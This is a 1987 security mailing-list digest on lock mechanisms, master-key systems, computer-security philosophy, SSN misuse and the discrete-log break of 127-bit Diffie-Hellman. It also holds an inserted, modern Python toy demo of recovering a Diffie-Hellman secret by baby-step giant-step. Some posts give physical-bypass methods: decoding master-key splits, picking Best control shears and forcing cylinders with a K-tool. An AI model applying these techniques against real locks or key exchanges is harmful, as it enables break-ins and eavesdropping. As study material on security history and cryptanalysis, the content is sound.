Well, the first one with the dimples [I forget the name -- K-something] is relatively straightforward; the dimples simply push pins outward from the keyway certain distances like a regular pin lock.
The pins protrude into the keyway from a couple of different directions; the theory being that such a configuration is harder to pick. Well, they tried. The severe limitation here is the number of cuts per pin -- the total travel isn't that far, so you can only have three or four distinct cuts [i.e. dimple depths] per pin. They compensate by using more pins. A similar method is found in Fichet cylinders, which use a key with an H-shaped cross section to address four rows of pins.

The other kind, with the slanted cuts, are Medeco or Emhart. Ahh, Medeco. I've recently had an in-depth go-round with a few of these myself after they installed them on my office area. These are in theory "unpickable", because of a rather complex sidebar system and lots of "false" positions that the parts can get into but still not open the lock.

The configuration is similar to a standard pin-tumbler lock in that you have pins and drivers as usual. The difference is that the pins are chisel-cut, so that when they drop into the V-shaped key cuts they are forced to rotate to conform to the cut orientation. Into the right side of each pin are milled one or more vertical slots, about .025 inch deep for the "real" slots and less for the false ones. Located just to the right of the pins is a sidebar which normally protrudes into a slot in the shell. The sidebar has six little flat teeth, each of which sticks through a small hole directly at the side of each pin and each of which is slightly narrower than the pin slots. If the pins are rotated such that all the deep slots line directly up with the sidebar teeth, the sidebar can fully retract into the plug, allowing it to turn. If any tooth encounters the side of the pin, or even a false shallow slot, the sidebar blocks rotation. All this is in *addition* to the regular pin-driver action, which is further confused by liberal use of mushroom drivers and funny shapes at the top of the pins.
The pin tops are slightly beveled so that they bear against the driver with a small contact area. This allows easier rotation.

However, all this is perhaps not as hairy as it sounds. The rotations are limited to zero and plus/minus 30 degrees or so. I believe there aren't a lot of different cut heights, either. While ding near impossible to pick, it's possible to fool with it until it cocks over into some false positions. At this point it's possible to get some information about the insides. Very occasionally someone does get lucky and successfully picks one open, but not at all repeatably.

The blanks for these are usually restricted, the cut keys are registered with the company and have "do not duplicate" stamped all over them, and not every place that does keys has a Medeco machine, which is apparently expensive. Creative sheet metal work can get around this, but the tolerances involved are quite exacting. One thing Medecos have going for them is that they are *very* nicely machined; if you removed the sidebar assembly from one it would still be a pretty decent lock. [Note that if you remove the sidebar, pin rotations no longer matter.]

_H*

From: Bill Sommerfeld 11-Nov-1987 20:36:50
To: Nick Papadakis <@eddie.mit.edu:nick@MC.LCS.MIT.EDU>
Subj: [3831] Re: Why secure systems?

[You wanted flames.. Here comes one ]

Stallman's comments may make sense for a small, cooperative community, where everyone has a chance to know everyone else, and everyone involved has at least some interest in the "common good". However, not all computer-using communities are like this, and there are very good _economic_ reasons (involving the cost of hardware) why many cannot be set up this way.

Computer security is somewhat like locks on doors; it isn't perfect, but it serves to deter vandals. Most people can't get through them without keys. People who can get through locked doors generally fall into two categories: responsible (locksmiths), and irresponsible ("criminals").
[There is also a very small group of "amateur locksmiths" in the middle who have some of the skills necessary, are officially part of the criminals, but only apply the skills for "exploration" of interesting areas. These people may make up a fair proportion of this list, but are probably not a significant proportion of society at large; in any event, they generally do no harm to society].

To argue that removing locks is the best way to eliminate crime makes no sense. Perhaps it would work in a truly cooperative ``socialist'' society, where everyone put the good of the whole ahead of personal gain. There are examples of small groups where this holds to a certain extent (for example, a typical family unit), but there are very good reasons why a large-scale version of such a society cannot exist.

What does this have to do with computer security? What it boils down to is that the shared use of any resource (including computers) by a group of people who do not have a compatible set of goals requires some form of internal compartmentalization or ``security''.

For example, think about a timesharing system or shared fileserver being used as part of a class. It is certainly in the interest of the students to prevent others from destroying their work. It may be in the interest of the students to _not_ allow other people to copy their work (at least, not without permission); it is certainly in the best interests of the teacher to provide a means to limit un-credited plagiarism. If the class involves individual work, then the solution is simple - have everyone put all their work on removable media, which they can carry around with them. If, on the other hand, the class involves work in small teams (as is the case in the software engineering and compiler courses around MIT), the use of removable media makes cooperation impossibly hard, and there needs to be some way to set up common file space which only the group members should be able to access.
A security/protection system which prevents people from doing work is clearly counter-productive; studies have shown that programmer productivity increases when there are no internal security barriers which get in the way. The key is to design a security system which provides enough flexibility and is easy enough to use so that it doesn't get in the way of people trying to do work. Of the systems which I have used, Multics comes the closest to this goal [1]. There are far too many poorly designed protection systems out there -- UNIX is one of the really bad ones.

Bill Sommerfeld (MIT '88)
MIT Project Athena

[1] Multics AIM (the access isolation mechanism, a non-discretionary access control system), is the only big wart -- it was designed to prevent trojan horses from letting classified information escape, and instead is probably a big waste of the users' time. It was also kludged in after the original design. Fortunately, it doesn't have to be used.

From: 12-Nov-1987 00:41:33
To: security@red.rutgers.edu
Subj: [1246] Student Lab Security and Preventing Trojan Horses

We have an interesting solution to the problems of preventing
1. software theft from student labs,
2. surreptitious patching (Trojan horses).

Application software is stored in an encrypted form. A special loader takes the encrypted image, decrypts (thus verifying), loads, and starts it. As an added bonus, the loader may also record accounting information.

The loader must provide its own security by
1. verifying it is not running on a pirate machine,
2. not divulging the encryption password, even under interrogation,
3. ensuring that its own image has not been patched.

Students may copy software, since it is useless without the loader. An image can only be modified if both file security was compromised *and* the intruder can decrypt, patch, and re-encrypt the image. The procedure is almost transparent.
The user must prefix the usual command with the name of the loader, for example, if the loader is called "RUN", the user must type "RUN VISICALC".

Derek Andrew, U of Saskatchewan, Andrew at Sask on BitNet/NetNorth

From: Jeffrey Del Papa 12-Nov-1987 14:49:30 To: marks@Sun.COM Subj: [579] re: master keys

> Talking about master keys and such, has anyone seen a type of
> key that has no teeth and it is just a straight piece of metal?

Those sound a lot like one of the old Sargent systems. Basically what they had was three intersecting sets of pins 120 degrees apart, the idea was that you had to pick 3 sets to get in, without any guides for the pick. The weakness was that the keyhole was large enough to allow easy mutilation of the pins.

From: rutgers!.csc!im4u!ti-csl!dnichols@uunet.uu.net (Dan Nichols) 12-Nov-1987 16:04:16 To: uunet!misc-security@uunet.uu.net Subj: [953] Home security

I just had my home burglarized last weekend and am now looking into various ways to prevent or at least deter this from happening again. Have there been any previous discussions about this? If not, how about getting one started? Does anyone have any personal experiences with security services? The options seem to range from $3000 monitored systems down to timers for your lights and a dog in the yard. I have two young children and a cat and small dog which make a motion detector pretty unusable. Any ideas?

Dan Nichols
Texas Instruments Inc.
POB 655474 M/S 238
Dallas, Texas 75256
USENET: {allegra,ihnp4,uiucdcs,sun}!convex!infoswx!ti-csl!dnichols
ARPA: Dnichols%TI-CSL@CSNet-Relay
CSNET: Dnichols@Ti-CSL
VOICE: (214) 995-6090

From: NESCC%NERVM.BITNET@wiscvm.wisc.edu (Scott C Crumpton) 12-Nov-1987 16:29:01 To: SECURITY@RED.RUTGERS.EDU Subj: [1404] PC security

There are several systems on the market that will provide a security function for a PC with a hard disk.
Some of these systems are quite sophisticated, including such features as user authentication, user login and program usage audit trails, access controls for files and directories, data encryption, access controls for the floppy drives, etc. I have a system called ENIX.SYS from VuTek on my PC at work. Unfortunately, it's an orphan now. One of the features that it had that would be particularly useful in the PC lab was the ability to create directories that were execute only. Definitely a deterrent to software theft. ENIX.SYS is a hardware based system with a device driver to interface to DOS. Currently, I am only using the hardware to prevent unauthorized persons from using my PC, the rest of it isn't of much value on a single user system. I was using the automatic data encryption feature, until the first time I ran Disk Optimizer and totally scrambled my hard disk.

Anyway, these systems do work. But you need to be very careful in selecting one. I would definitely require an evaluation unit before purchasing one. Prices range from $200 to $2000 per PC, it all depends on how much the data/programs are worth.

---Scott.

From: mason@oberon.lcs.mit.edu (Nark Mason) 12-Nov-1987 16:39:42 To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net, security@RUTGERS.EDU Subj: [1345] RE: the KEY Discussions

The first lock you mentioned, a seemingly blank piece of metal with dimples cut in the side, is most likely a Kaba or Dom. They work the exact same way as a regular lock except instead of the pins pointing top to bottom they point side to side and the dimples cut to varying depths substituted for the notches in the top of a conventional key. This way there can be more than 1 set of pins. I have seen them with 4, more could be done easily.

The second type is a Medeco. The notches in the key are cut at an angle, there are 3 orientations labeled Left, Right and Center.
The pin that contacts the key is wedge shaped instead of pointed, so the pin has to be in the right orientation as well as the right height. Each pin has a notch in the side of it, when they are all at the right orientation the notch is pointing perpendicular to the lock. There is a bar in the side of the lock that has fingers that fit into each of the holes. When the pins are all at the right orientation all the fingers slide into the slots, the bar slips to the left and if the pins are all at the right height as well the lock can be opened. Medecos are effectively pick proof.

Nark

From: gwyn@brl-smoke.arpa (Doug Gwyn) 12-Nov-1987 17:36:05 To: misc-security@uunet.uu.net Subj: [1137] Re: mastered systems

>Similarly, if you're going to try and determine the master combo for a given
>system, you do need to take at least one example apart.

Actually, if you have an operating key, you need not remove the lock cylinder in order to determine all the pin splits in it. Obtain one extra key blank per pin column (7 for the typical institutional Best lock); duplicate the operating key except for one column on the blanks, omitting a different column on each blank. Then, for each blank, try it with the omitted column cut to number 0 (high), then 1, then 2, ... and record which bittings open the lock. That tells you what the splits are in that column. The whole set of trials tells you what all the splits are in all columns. The best way to cut the keys is with a code machine; next best is to duplicate from a depth key set; third best is to set up an extra cylinder plug with just one pin of the desired length in the appropriate column, and file down the key until it brings the pin flush with the plug.

From: Jose Rodriguez 13-Nov-1987 09:29:49 To: security@red.rutgers.edu Subj: [1965] something of some interest, subject: breaking DES

Subject: Authentication protocols
Date: Thu, 12 Nov 87 12:19:21 -0500
From: Craig Partridge

Something to think about when using DES....
Date: 12 Nov 1987 11:11-EST
From: Eric.Cooper@spice.cs.cmu.edu
To: end2end-tf@venera.isi.edu
Subject: RE: Breaking DES

Here's Evi's response when I asked her a week or so ago:

Date: Fri, 30 Oct 87 19:32:32 MST
From: evi@boulder.Colorado.EDU (Evi Nemeth)
To: Eric.Cooper@SPICE.CS.CMU.EDU
Subject: Re: DES breakthroughs?

the break is in the diffie hellman key exchange for des based on 127 bits. it was done quite a while ago, solving the discrete log problem for the field 2 ** 127 -1. the work was with ron mullin at the university of waterloo. the actual implementation of the algorithms was done on the denelcor hep supercomputer (since defunct) in 1984. there were several technical papers by mullin and by coppersmith at ibm yorktown on the method of attack. our paper on the implementation which includes a description of the algorithm but not the gory details, was in the proceedings of the international conference on parallel processing in the summer of 1984. i can send you a copy if you don't have access to the proceedings. the paper actually won the best paper award at that conference, no $$, but i got a plaque for my wall and denelcor sold a machine to nsa.

the reason i mentioned it to van was that sun has now done two talks at meetings about their security on the network that is based on des using the diffie hellman key exchange in exactly the field that we broke. both times the talk was given by the programmer who is implementing it not the mathematician who decided what to be implemented. i pointed them again to the papers on it; hope a number theorist there actually reads them.

evi

From: 13-Nov-1987 11:17:37 To: security@red.rutgers.edu Subj: [463] RE: Bumper Beepers.

And by the way, US Citizens have no reasonable expectation of privacy regarding movements tracked in public, said the Supreme Court in 1983: US v. Knotts, 103 S. Ct. 1081 (1983).
However, I imagine that installing a beeper on someone else's car without their knowledge or permission is trespassing at the very least.

Ed

From: rogers@marlin.nosc.mil (Rollo D. Rogers) 13-Nov-1987 15:56:12 To: @eddie.mit.edu:nick@MC.LCS.MIT.EDU Subj: [1754] Re: Why secure systems?

Well, as a Computer Security person I look at this a little differently to say the least. There may be some system admin or security people that run a very tight ship (computer-system-wise). However, I agree that the users must be able to get their work done in a timely and efficient manner. But I have a problem with just making it an "open" system for just anybody to access. In the DOD we have systems that store and process National Security Info as well as Sensitive and Privacy Act data. Certainly we have the right to insist that users have a need-to-know for these types of files stored on a given system. A user also has the right to decide which other users are going to be allowed access to the files he/she creates. We just cannot open up all the data on the system to every user just because they think it would be "nice"!

There is a serious problem now with the management of the SUPERCOMPUTER systems in the U.S., as the universities want to open the system up to any scientist user in the world (including the users in the USSR). This can be a real problem since these computers can be used for military weapons APPLICATIONS. Should we deny this type of user access to these powerful tools?

In conclusion, I think that we have to strive for a happy medium while trying to balance the need for Computer Security with the users' requirement to get the job done. But if I am going to err, it will be on the side of Computer Security and the protection of data stored on the system! As the saying goes, 100% security equals 0% productivity!!
Regards, Rollo Rogers, ADP SECURITY

From: UJ0%psuvma.bitnet@RUTGERS.EDU 13-Nov-1987 23:40:45 To: rutgers!misc-security@e.ms.uky.edu Subj: [398] Infinity

Ever heard of an "Infinity Transmitter"? It allegedly would allow the user to dial a phone number and disconnect the ring. By amplifying the signal, it would allow the user to eavesdrop anywhere where there was a phone. I heard that they exist, but maybe not...

Paranoia

From: Jonathan Harris 14-Nov-1987 00:16:33 To: security@RUTGERS.EDU Subj: [795] SSN

In reply to the few examples people brought up of how someone can destroy you with a knowledge of your SSN:

(1) The activities--getting the false drivers license, using it to obtain information about you, etc... are all serious criminal offenses. The abuser would cause you some hassles, which you would eventually clear up, and eventually find himself in jail with felonies on his record, drunk driving, etc... The reissue of the drivers license would certainly show up on the public record and be evidence in your favor.

(2) If he really wants to be that nasty there are much easier ways than that to cause you trouble. ie. vandalize your house or car.

---Jonathan

From: gwyn@brl-smoke.arpa (Doug Gwyn ) 14-Nov-1987 18:03:39 To: misc-security@uunet.uu.net Subj: [756] Re: Yet more about SS numbers

Strange how none of the posted responses noted the root problem, that there is seldom any verification that a person is who he claims to be. Some people have several SSNs to take advantage of this situation and maintain multiple "identities". I wish there were a definitive court case that would throw out any evidence compiled against an individual without every entry being validated, for example by fingerprint matching. Surely we have the technological capability to perform accurate personal identity validation; it wouldn't be much more elaborate than the current credit-card-authorization-by-modem scheme.
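The key-exchange weakness Evi Nemeth describes in the DES thread above, as an added worked example that is not from any message in this digest and not the Sun or Waterloo code: a toy Diffie-Hellman agreement in a characteristic-2 field GF(2^N), with N = 17 standing in for 127 (both prime, and both with 2^N - 1 prime, matching the group order she alludes to), followed by a baby-step giant-step recovery of the session secret from the two public values alone. The generic square-root attack suffices at toy size; the point is hers, that a DES key agreed this way is only as strong as the discrete-log problem in the chosen field, and the Coppersmith and Mullin methods she cites are what made the real 127-bit field tractable in 1984.

```python
"""Toy Diffie-Hellman in GF(2^n) and the discrete-log attack that defeats it.
Added example, not from the digest or from Sun/Waterloo. Field elements are ints
whose bits are GF(2) polynomial coefficients; N = 17 stands in for 127."""
import math
import secrets

N = 17  # toy degree (assumption); prime, and 2^N - 1 is prime, like 127

def gf_mul(a, b, m):
    """Product of two reduced elements of GF(2)[x]/(m), shift-and-xor style."""
    dm, r = m.bit_length() - 1, 0
    while b:
        if b & 1:
            r ^= a
        b >>= 1
        a <<= 1
        if (a >> dm) & 1:  # degree reached dm: subtract (xor) the modulus
            a ^= m
    return r

def gf_pow(a, e, m):
    """Square-and-multiply exponentiation in GF(2)[x]/(m)."""
    r = 1
    while e:
        if e & 1:
            r = gf_mul(r, a, m)
        a = gf_mul(a, a, m)
        e >>= 1
    return r

def prime_factors(k):
    """Distinct prime factors of k by trial division (k is small here)."""
    out, p = [], 2
    while p * p <= k:
        if k % p == 0:
            out.append(p)
            while k % p == 0:
                k //= p
        p += 1
    return out + ([k] if k > 1 else [])

def is_irreducible(f):
    """Rabin's test for prime degree n: no root in GF(2), and x^(2^n) == x mod f."""
    n = f.bit_length() - 1
    if not (f & 1) or bin(f).count("1") % 2 == 0:  # f(0) == 0 or f(1) == 0
        return False
    xp = 2  # the polynomial x
    for _ in range(n):
        xp = gf_mul(xp, xp, f)
    return xp == 2

def find_irreducible(n):
    """Smallest irreducible polynomial of prime degree n (odd, so x is no factor)."""
    f = (1 << n) | 1
    while not is_irreducible(f):
        f += 2
    return f

def find_generator(m):
    """Smallest element whose order is the full group order 2^n - 1."""
    order = (1 << (m.bit_length() - 1)) - 1
    g = 2
    while any(gf_pow(g, order // q, m) == 1 for q in prime_factors(order)):
        g += 1
    return g

MOD_POLY = find_irreducible(N)
ORDER = (1 << N) - 1  # size of the multiplicative group GF(2^N)^*
G = find_generator(MOD_POLY)

def dh_keypair(g, m):
    """One party's (private exponent, public value g^x)."""
    x = secrets.randbelow(ORDER - 2) + 1
    return x, gf_pow(g, x, m)

def discrete_log(g, h, m, order):
    """Baby-step giant-step: the x with g^x == h, in about sqrt(order) work."""
    s = math.isqrt(order) + 1
    baby, cur = {}, 1
    for j in range(s):  # baby steps: g^j
        baby.setdefault(cur, j)
        cur = gf_mul(cur, g, m)
    giant = gf_pow(g, order - s, m)  # g^(-s), since g^order == 1
    cur = h
    for i in range(s):  # giant steps: h * g^(-s*i)
        if cur in baby:
            return (i * s + baby[cur]) % order
        cur = gf_mul(cur, giant, m)
    raise ValueError("no logarithm found")

def eavesdrop(g, pub_a, pub_b, m):
    """What a passive listener computes from the two public values alone."""
    return gf_pow(pub_b, discrete_log(g, pub_a, m, ORDER), m)

def demo():
    """One exchange; True when the listener recovers the agreed session secret."""
    a, pub_a = dh_keypair(G, MOD_POLY)
    b, pub_b = dh_keypair(G, MOD_POLY)
    shared = gf_pow(pub_b, a, MOD_POLY)
    assert shared == gf_pow(pub_a, b, MOD_POLY)  # both parties agree
    return eavesdrop(G, pub_a, pub_b, MOD_POLY) == shared
```

Raising N to a size where sqrt(2^N) steps is infeasible defeats this generic attack, but not the field-specific methods in the papers she cites; that gap between generic and specialised cost is exactly what the message warns about.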
From: *Hobbit* 19-Nov-1987 06:23:35 To: security@RED.RUTGERS.EDU Subj: [628] mister pay phone

If they know so much about this guy, why isn't he in the klink already? Pay phones generally use lever locks. These were invented ages ago, before the pin-tumbler, and are still in use on things like phones and safe deposit boxes. A properly constructed one is extremely difficult to defeat; there are numerous false or "confuser" notches built in, and very specialized tools are probably required. It would seem more likely that this guy knocked over a coin collector and stole his key ring.

_H*

From: warren@xanth.cs.odu.edu (Frank F. Warren Jr.) 15-Nov-1987 14:43:05 To: misc-security@mcnc.org Subj: [566] Re: Internal setscrews

>Does Medeco or Abloy have any such mechanism? *That* would make things
>pretty difficult...

Yes, Medeco does produce interchangeable core cylinders compatible with certain Yale housings.

Frank Warren, Jr.
Old Dominion University - Norfolk, Virginia
warren@xanth.cs.odu.edu
Old Arpa: warren%odu.edu@RELAY.CS.NET
warren@xanth.UUCP
old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!warren
Packet: KB4CYC@WD4MIZ

From: quintus!gregg@Sun.COM (W. Gregg Stefancik) 12-Nov-1987 18:03:09 To: security@red.rutgers.edu Subj: [945] Picking the Best control shear

According to some books on the subject of interchangeable cores it is possible to pick the control shear only by applying tension to the control sleeve only. By applying tension to the control sleeve only, the pins will only bind at the control shear. You may ask, how does one apply tension to the control shear? Best cores have holes in the core sleeve for ejecting pins, one merely modifies a tension wrench to fit into one of these holes such that it only contacts the control sleeve (the uppermost sleeve layer). If your wrench goes into the hole too far you will be applying tension to the entire core assembly which will get you nowhere fast.
I have yet to try the above technique, but logic seems to say that it should work.

Gregg Stefancik
Professional Security Consultant

From: Matthew Hull 17-Nov-1987 02:14:53 To: SECURITY@RUTGERS.EDU Subj: [14206] Computer Security Systems

I think that for the first time since I signed into this SIG I may be able to contribute, since opinions are cheap and I have many and no knowledge is required ;-) But before I do I'd like to cover my *ss a bit by clarifying that I understand that the opinions expressed were not necessarily those of Mr. Papadakis' and that any references to 'you' are probably the universal 'you' or to those who disagree with my opinion. I'd also like to deny permission to all persons to use this message, and any reply messages which contain references to it, to my detriment by bringing it to the attention of my employer (either directly or indirectly). [Hey, it can't hurt.]

_Part_One_

>If you look at the social organization of the users on a typical
>timeshared computer of today and compare it with other social groups, it
>most resembles the Soviet Union. It is pervaded by suspicion, ruled
>arbitrarily by a small oligarchy, and hostile toward outsiders. This
>arouses resentment, which inspires the security crackers. But the
>authoritarian social organization itself is a worse problem than the
>crackers are.

I must confess that this rings truth to me. It _does_ resemble a totalitarian organization. As a means for an efficient execution of the tasks which a computer is typically used to perform, this form of organization is a natural answer to the problem at hand. Doesn't make it right, but it _is_ efficient. Usually, the running of a computer system centers around making sure a known set of programs executes as needed. Additionally, the administration is responsible for the development of new programs and to maintain the existing system in response to dynamic needs as defined by the owner of the computer.
The oversight of a running system is relatively simple and easy compared to maintenance and development, and requires no more sophisticated form of organization than the totalitarian one which typically exists. That is _why_ it exists (or at least one reason). The second main task, maintenance and development, figures a smaller role in the system of things (although it gets far more notice), and can also be handled efficiently by "a small oligarchy."

Does efficiency justify the occasional unfairness implicit in an organization where the few rule the many? Probably not, in a theoretical sense. But in a practical sense, things are different. You can use a political organization as an allegory as convenient, but remember it is _only_ an allegory; and perhaps, not a very good one. In a political structure the assumption most Americans assume is that the organization exists to serve the people. This is not necessarily the case with computer organizations. In the political world many have adopted the idea which exists in our own Constitution that man has by natural law a certain set of inalienable rights which it is the responsibility of the political organization to defend and ensure. This is certainly not the case in a time-sharing computer organization. The users are using a machine owned by a 'legal entity' (ie. a person, a company, the State or National government) and are not participating in anything as basic as the right to a free and peaceful life. The users _do_not_ have a certain set of inalienable rights granted by natural law in the use of someone's computer, and cannot expect treatment similar to that given them by their political government. This means that if you are repressed, you _do_not_ necessarily have the right to object. If you are not among the privileged few, you _do_not_ necessarily have the right to rant and rave your inequality, nor expect that things will (or even should) change for your approval.
In sub-conclusion, whereas the typical organization is similar to a totalitarian government, you do not have any natural right to expect or demand 'better' treatment.

_Part_Two_

>Most computer users see no alternative. I am fortunate in having
>experienced one. At the MIT laboratory where I have worked as a
>researcher for ten years, our old computer system treated users as free
>equals with a responsibility to cooperate, and guests were welcome. Our
>hospitality guided clever young people to become responsible engineers
>rather than crackers.

>The software on most computer systems is designed to support the ruling
>class just as surely as the KGB is. The software written and used by
>the hackers at MIT was designed to make users free and equal. Our
>system had no restrictions that could be imposed on selected users; all
>users were treated alike. Thus nobody could seize power by restricting
>everyone else. We did not care whether a change to the files was
>authorized; we cared whether it was an improvement. This can only be
>decided by human beings, on a case-by-case basis. So, rather than
>having file protection to control changes, we called for discussion
>of any planned change.

These paragraphs, and most of the rest of the excerpt, argue that a 'free system' is better than a traditional system with restrictive security measures. For 95% of the world's computers, this is simply not true. And perhaps Stallman would agree: "We should put military secrets, bank records and the like on computers with strict security. For other activities, we should have computers that are free of security, and free of its burdens." The trouble is that almost all systems consider their data just as important and confidential as any bank. And I argue that they _should_ have the right to decide how confidential their data will be, using strict security, because it is _their_ computer.
Now, if you restrict your generalization of "a typical timeshared computer" to computers used for educational purposes, with no data of any sensitive nature, then the argument immediately becomes more tolerable. Presumably, with no sensitive data to protect, the administration which owns the computer should allow the users a 'free system' in which to work and learn. The users in this 'free system' would be responsible to no one for their actions, would have free access to all files of any nature, would be able to allocate resources on a first come, first served basis, and would not be limited in the content and use of their files and programs. And such an environment would be conducive to the growth of "responsible engineers rather than crackers."

This sounds very nice, and would likely be quite acceptable in an environment of responsible engineers, but when put into an environment of 18 - 22 year old students at a typical university, comes out only as the pipe dreams of an old UNIX hacker (pun intended). At this university, which I judge typical, there _are_ people who would delete a person's files given the opportunity. Maybe the computer users at MIT were exceptionally considerate, but at the typical university the typical user is a student using the computer only for the word processor, and has little knowledge and less respect for the computer, its structure, and its users. Nevertheless, I suspect that vandalism would still be rare (my basic optimism in humanity :-)) but when it did occur it would be drastic ( $ Delete *:[*]*.*;* ). Should such disasters be _allowed_ to occur? More often, I suspect, would be the individual disasters where Mr. X gets Mr. Y pissed off, and Mr. Y is a total jerkface, so Mr. Y deletes, or worse, encodes, all of Mr. X's files. Perhaps a user prefers that his resume, and his letters to his wife, etc., are not available to the general public?
Should we be limited to simple trust that no one will look into his private directory of files?

There are problems in all of the freedoms in your free system, not simply the obvious one concerning file protections. You let slip an indication of a potential problem in your article:

"And if a stranger came to the lab and wanted to play with the computer
when it was not fully needed by us--we let him!"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

What's this I read? Who is "us?" Some of the users who are all treated alike? How can anyone "let" another equal user use what is rightfully his to use as an equal user? Oh, he's a "stranger." How can he become one of the equal users? Popular election? Have him pass a test? Require n number of hours of computer use? Pardon my sarcasm, but what is obviously needed in this case is an authority-- some person or group of persons whose responsibility it is to initiate strangers into users. This authority is also necessary to resolve an innumerable list of potential conflicts among users, even if they do all behave as responsible engineers. Who is to decide the needs of the many users of the computer? Who is to tell Mr. Y that he has used the printer long enough? Who is to tell Mr. Y that his Graphic simulation is very nice, but it takes up too much CPU time? And when they do not behave as responsibly, who is to tell Mr. Y that his Random Write program (which he uploads from floppy on occasional bad moods) is improper and destructive use of the computer system? Who is to tell Mr. Y that the female students (as a whole) do not appreciate his little pictures which he mails to them, or causes to print to their screens when they log in? Who is to tell Mr. Y that if he doesn't stop being a total jerkface, he won't be allowed to use the computer anymore? You _need_ some form of authority beyond and _above_ the normal abilities of the regular user, with the power to enforce its decisions against a user who may not agree with them.
This is what 'security' does. It also prevents Mr. Y from ever being able to do his misdemeanors before any damage is done. It protects the integrity of those files which the file owner desires to remain safe, while still allowing freedom where it is desired. It protects the ignorant from their own errors, and it protects others from a user's ignorance. And best of all, it _can_ be turned off if the protection is _not_ wanted. But many of the system level protections, such as file quotas, are in the domain of the group with authority which governs and protects the system.

For an educational computer sans sensitive data, the 'group with authority over the system' need not be a small oligarchy resembling a totalitarian state. It could very well be a Bulletin Board program which allows the posting of proposals by users and the analysis of a popular majority rules vote. It could be an elected assembly, with terms of office and specific rights and prohibitions. It could be a single individual determined by the 'most creative use of the system as expressed in Assembly language.' The point is that this kind of computer environment can be governed by any type of organization, so long as the computer is put to effective and proper use as defined by the owner(s) of the computer. A completely free system without protections and without any authority would not serve this purpose.

_Part_Three_

>So far the issue of security versus freedom on computer systems affects
>mainly computer hackers. But, in the future, computer systems will play
>a bigger and bigger role in everyone's life. And these systems will be
>built on today's entrenched authoritarian tradition, unless we stop it.
>The crackers are a warning sign of a problem that every American is
>going to face--soon.

Yes, this is at the same time wonderful and scary and sad. And also true.
The difference here is that these computer systems _will_ be for the purpose of serving the people, and thus the people should have more of a say in how they will be used, and how they will be governed. The old days of Gripe Logs (public display of user complaints and the responses given by those in authority) will not suffice in these future days, and some provisions for user objections, public access and input towards policy, public 'trials' to determine guilt or innocence for misdemeanors, and a more sophisticated structure of organization with the checks and balances our own government is well known to have will need to be initiated and tested, and finally used in practice. Who knows, the organization which emerges from these public computers may well be used as the template with which new governments are formed in the 'Final Frontier', just as the corporate organization was used as a template for our own budding American government. If such becomes the case, it is my sincere hope that much forethought goes into the development of such a system.

And in the interest of _preventing_ a flame war, which is much too violent a phrase, I pose the following question: What constitutes a secure and _just_ security system for a public service computer system (network?) which by definition has significant consequence over the lives of the people whom it serves? One thought that immediately comes to my mind is the old question of who will police the police? How much access should 'the police' have, and how can it be enforced? What system of input would effectively reflect the opinions and attitudes of the people served? How can a process analogous to a judicial system be executed? Can any computer system ever be physically secure, given the range of access needed (public to a large group of people spread over a large area)? I could go on and on and on and on ....... Any thoughts out there that may resemble answers?

Matthew G. Hull
CSU Information Systems
New Britain, CT.
06050
BITNET: HULL@CTSTATEU

ps. My apologies to any readers who may object to my generalization of the American government and Constitution as "ours." I mean no implicit criticism towards the government of any other country.

From: gwyn@brl-smoke.arpa (Doug Gwyn ) 17-Nov-1987 02:14:53 To: misc-security@uunet.uu.net Subj: [572] Re: Internal setscrews

>A certain proportion of the locks in a
>large campus system will "default" to the control shear line during picking.

Actually, if you're really into Best locks, you should make a special tension wrench that grabs onto the holes in the bottom of the plug sleeve corresponding to the control plug. This makes picking the control shear line fairly easy. Some Best locks use spool pins, but a competent lock picker can cope with that too.

From: gwyn@brl-smoke.arpa (Doug Gwyn ) 17-Nov-1987 02:19:44 To: misc-security@uunet.uu.net Subj: [2306] Re: the KEY Discussions

>One had no slots, per se. Instead, it essentially looked like a blank with a
>number of dimples of differing sizes drilled on both sides of the blank.

Sounds like the Sargent KESO system, which soon had some imitators. The blank cross-section is a squashed hexagon, with dimples milled into the flats at positions matching pins in the plug. There were three sets of pins (the key was reversible). All three had to line up their splits along the plug shear line before the plug would turn; otherwise it is just the ordinary Yale tumbler lock principle. The improved security was due to the restricted blank, the difficulty of duplicating or even producing a cut key, and the difficulty of picking three simultaneous shear lines.

>In other words, instead of just making the cuts at an angle perpendicular
>to the key, the cuts were offset at angles of 0, +5 and -5 from the
>perpendicular.

Sounds like the Medeco lock.
Its pins have wedge bottoms instead of the usual cones; the wedges cause the pins to twist, and since the pins are offset from the center of the plug (if I recall correctly), they have to be properly twisted to align smoothly with the shear line. There are also some systems like this with grooved pins and even more elaborate mechanisms.

Don't forget the "sidebar" locks used on current GM automobiles. There is also the Chicago "Ace" lock (with tubular key) often found on vending machines, and variations on that theme, including one with concentric nested pins.

All these locks can be picked, with varying degrees of difficulty, by someone who understands their construction and general locksmithing principles, who has or can make the necessary tools, and who is willing to spend the practice time required. There is a common opinion that any lock involving mechanical principles activated by inserting some sort of key into a hole is in theory pickable. The most secure lock systems I know of that are in general use involve "card keys" and have computers that log lock activity. If you couple one of these with some form of personal validation (hand geometry or retinal scan), that's probably the best you're going to be able to do.

From: ron@topaz.rutgers.edu (Ron Natalie) 17-Nov-1987 16:01:26 To: misc-security@RUTGERS.EDU Subj: [829] Re: master key security

You wouldn't need to do anything as drastic as saber sawing to steal the lock. While you need a change key to remove the core, you can pull the whole cylinder if you have the door open without damaging anything. You then take it home and crack it open. If you don't have a key, you can open the door by some forcible means or you can just rip out the cylinder. There is a device called a K-tool that I have used exactly once. It is a piece of metal that slides over the cylinder. You place the end of a halligan bar into the slot on the K-tool and then hit the whole thing with a heavy object (the flat end of an ax works well).
The lock comes out of the door in one easy motion.

-Ron

From: psw@wolfgang.arpa (Phil Wherry) 17-Nov-1987 20:09:52 To: LINNIG@eg.ti.com, security@RUTGERS.EDU Subj: [2253] Re: master key security

I'm a student at the College of William and Mary, and I can say from more-or-less first-hand experience that a college administration's reaction is to merely shrug their shoulders and cross their fingers in the wake of a fairly major breach of master key security. Quoting from our campus newspaper,

